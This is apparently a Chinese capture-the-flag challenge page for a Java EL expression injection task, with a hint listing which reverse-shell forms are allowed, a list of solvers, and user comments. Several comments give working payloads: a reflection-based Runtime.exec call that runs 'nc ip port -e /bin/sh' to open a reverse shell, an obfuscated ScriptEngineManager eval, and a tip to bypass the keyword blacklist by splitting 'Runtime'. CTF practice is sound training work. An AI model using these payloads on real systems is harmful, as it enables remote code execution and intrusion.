Java EL表达式注入WEB 未解决
分数:
35
金币:
4
题目作者:
云牧青
一 血:
广告位招租
一血奖励:
10金币
解 决:
85
提 示:
描 述:
/bin/bash: X ; /bin/sh √ ; /dev/tcp X ; nc -e ip port X ; nc ip port -e √ ;
评分(2)
解题动态
binyu 攻破了该题 5天前
SkyAsh 攻破了该题 25天前
yanzhenfeng 攻破了该题 1月前
网恋秀牛子被录屏导致自卑 攻破了该题 1月前
ycxlo 攻破了该题 2月前
Achernar 攻破了该题 2月前
365days 攻破了该题 3月前
mantou 攻破了该题 4月前
M1crow3ve 攻破了该题 5月前
Bug@Bug 攻破了该题 5月前
admin666 攻破了该题 5月前
liusongxn 攻破了该题 6月前
kukuqi666 攻破了该题 6月前
ilovevicky99 攻破了该题 7月前
是大方子 攻破了该题 8月前
JJJleo 攻破了该题 8月前
帅气的冬瓜 攻破了该题 8月前
雾島风起時 攻破了该题 9月前
tingsi464 攻破了该题 10月前
评论
qq1002517 4天前
举报
反弹服务器没的。算鸟
binyu 5天前
举报
''.getClass().forName('java.lang.Run'+'time').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Run'+'time').getMethod('getRu'+'ntime').invoke(null),'nc ip port -e /bin/sh')
李逍遥逛霍格沃茨 8天前
举报
浪费时间和金币的题目,花金币买了write up也做不出来 最大问题是反向连接建立不了 按照两边的教程监听端口一点反应都没有 纹丝不动
l1nci 9月前
举报
做不出来,金币-5,呜呜呜
ailx10 1年前
举报
嘻嘻,参考:https://zhuanlan.zhihu.com/p/721560334
lzhui 1年前
举报
金币 -5
blackjack009 2年前
举报
new javax.script.ScriptEngineManager().getEngineByName(new String(new byte[]{106,115})).eval(new String(new byte[]{106...........}));
jack12138 3年前
举报
利用Java反射机制实现RCE,参考:http://www.hackdig.com/08/hack-459909.htm,题中用''.getClass()替代了Class,黑名单可利用字符串拼接绕过,如''.getClass().forName('java.lang.Run'+'time')
jack12138 3年前
举报
没做出来,记录一下,应该跟 MVEL.eval 有关系?没试出来
chips 3年前
举报
好难 金币-5